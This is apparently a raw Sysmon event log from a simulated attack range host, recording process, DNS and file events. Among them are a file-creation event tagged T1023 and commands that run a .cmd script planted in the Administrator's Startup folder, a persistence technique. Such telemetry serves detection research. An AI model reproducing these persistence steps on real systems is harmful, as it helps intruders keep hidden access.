22542200x800000000000000013475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.470{59A5CD1D-940F-6005-0C05-00000000A301}6476www.bing.com0type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 www-bing-com.dual-a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;C:\Program Files\Internet Explorer\iexplore.exe 10341000x800000000000000013480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:53.476{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000013479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.846{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local65515-false169.254.169.254-80http 354300x800000000000000013478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.826{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local65514-false169.254.169.254-80http 734700x800000000000000013477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.352{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\System32\efsui.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x800000000000000013476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.493{59A5CD1D-93FA-6005-FA04-00000000A301}2120C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 
22542200x800000000000000013483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:52.599{59A5CD1D-940F-6005-0C05-00000000A301}6476ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files\Internet Explorer\iexplore.exe 22542200x800000000000000013482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:52.569{59A5CD1D-940F-6005-0C05-00000000A301}6476go.microsoft.com0type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:104.125.79.182;C:\Program Files\Internet Explorer\iexplore.exe 10341000x800000000000000013481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:54.741{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:54.011{59A5CD1D-8E56-6005-2E00-00000000A301}2464200.197.79.204.in-addr.arpa.0type: 12 a-0001.a-msedge.net;C:\Windows\sysmon64.exe 22542200x800000000000000013501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:52.649{59A5CD1D-940F-6005-0C05-00000000A301}6476ieonline.microsoft.com0type: 5 any.edge.bing.com;::ffff:204.79.197.200;C:\Program Files\Internet Explorer\iexplore.exe 10341000x800000000000000013500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:55.069{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-941F-6005-1E05-00000000A301}4192C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-941F-6005-1E05-00000000A301}4192C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:55.069{59A5CD1D-9416-6005-1305-00000000A301}69126916C:\Windows\system32\cmd.exe{59A5CD1D-941F-6005-1E05-00000000A301}4192C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+4917|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.081{59A5CD1D-941F-6005-1E05-00000000A301}4192C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /v DELETEME C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x800000000000000013492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:55.069{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-941F-6005-1D05-00000000A301}7092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:58:55.069{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd2021-01-18 13:58:55.069 10341000x800000000000000013490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:55.069{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.069{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-941F-6005-1D05-00000000A301}7092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:55.069{59A5CD1D-9416-6005-1305-00000000A301}69126916C:\Windows\system32\cmd.exe{59A5CD1D-941F-6005-1D05-00000000A301}7092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+484b|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:55.077{59A5CD1D-941F-6005-1D05-00000000A301}7092C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x800000000000000013508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.351{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.335{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.335{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.335{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\system32\wininetlui.dll+1cf4(wow64)|C:\Windows\system32\wininetlui.dll+1a52(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6161(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6d70(wow64)|C:\Windows\SYSTEM32\WININET.dll+2b5d83(wow64)|C:\Windows\SYSTEM32\WININET.dll+26a9b1(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+146b46(wow64) 
10341000x800000000000000013504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.163{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:56.163{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.038{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.022{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 